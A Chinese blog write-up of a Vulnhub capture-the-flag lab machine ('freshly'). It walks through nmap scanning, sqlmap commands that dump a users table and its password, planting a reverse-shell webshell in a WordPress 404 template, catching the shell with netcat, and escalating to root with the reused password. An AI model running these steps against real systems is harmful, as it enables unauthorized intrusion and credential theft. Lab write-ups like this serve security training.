Vulnhub靶机第六关

℡╲_俬逩灬. 提交于 2020-10-14 12:28:57

Vulnhub靶机 freshly
运行环境
Virtualbox
VM(运行会提示错误,给的解决链接已经404)
本靶机推荐使用Virtualbox搭建
说明
此靶机的目标是通过网络渗透进主机,并找到隐藏在敏感文件中的秘密。
运行环境
将下载的OVA文件导入进Virtualbox即可。
将虚拟机用virtualbox打开后设置为桥接网卡
在这里插入图片描述
查看本机网卡找到对应的ip段使用nmap 扫描
命令:ipconfig /all|more
Nmap -sT 192.168.1.0/24
在这里插入图片描述
切换网络时ip会改变
访问主页
在这里插入图片描述
使用御剑扫描目录
在这里插入图片描述
发现登录页
在这里插入图片描述
使用sqlmap扫描
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 查看是否存在注入点
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 --dbs 查看数据库
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” --tables 查看数据表
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” -T “users” --columns 查看字段
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” -T “users” -C “username,password” --dump 查看字段内容
得到账户密码:admin SuperSecretPassword
在这里插入图片描述
登录后台
http://192.168.1.54:8080/wordpress/wp-login.php
在404模板写入反弹shell 的大马
在这里插入图片描述
开启nc监听
在这里插入图片描述
访问404.php
在这里插入图片描述
拿到shell
在这里插入图片描述
输入:python -c 'import pty;pty.spawn("/bin/bash")'得到一个交互式的shell
在这里插入图片描述
输入 cat /etc/passwd
在这里插入图片描述
输入su 尝试切换到root用户,尝试输入注入得到的密码:SuperSecretPassword 成功切换
在这里插入图片描述
但是根目录下都是乱码
输入: ls -lh --color=never 乱码恢复正常
在这里插入图片描述
提权成功
















































易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!